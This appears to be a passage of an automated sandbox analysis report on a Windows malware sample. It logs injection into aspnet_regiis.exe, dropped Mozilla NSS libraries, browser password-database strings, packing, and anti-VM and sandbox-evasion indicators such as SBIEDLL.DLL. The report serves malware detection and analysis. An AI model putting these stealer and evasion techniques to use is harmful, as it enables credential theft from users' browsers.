                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FAF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2517531854.0000000002FB0000.00000004.00000020.00020000.00000000.sdmp, IJKFCF.3.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: file.exeReversingLabs: Detection: 21%
                          Source: file.exeVirustotal: Detection: 30%
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntvdm64.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.ui.immersive.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: bcp47mrm.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uianimation.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: resourcepolicyclient.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: d3d10warp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dxcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                          Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.3394302971.000000003A330000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.3389107122.000000002E456000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3403233819.000000006C9CF000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                          Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382616447.0000000022018000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.a90000.0.unpack n@G>6P:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: file.exeStatic PE information: section name: n@G>6P
                          Source: file.exeStatic PE information: section name:
                          Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                          Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE36D2 push esp; retf 0_2_00AE36D3
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE6827 push cs; retf 0_2_00AE6828
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E818C21 push ecx; ret 0_2_6E818C34
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042F142 push ecx; ret 3_2_0042F155
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00422D3B push esi; ret 3_2_00422D3D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041DDB5 push ecx; ret 3_2_0041DDC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7CB536 push ecx; ret 3_2_6C7CB549
                          Source: file.exeStatic PE information: section name: n@G>6P entropy: 7.9994507847955285
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: 0.2.file.exe.6e820000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6e820000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6e7f0000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2960, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: aspnet_regiis.exeBinary or memory string: DIR_WATCH.DLL
                          Source: aspnet_regiis.exeBinary or memory string: SBIEDLL.DLL
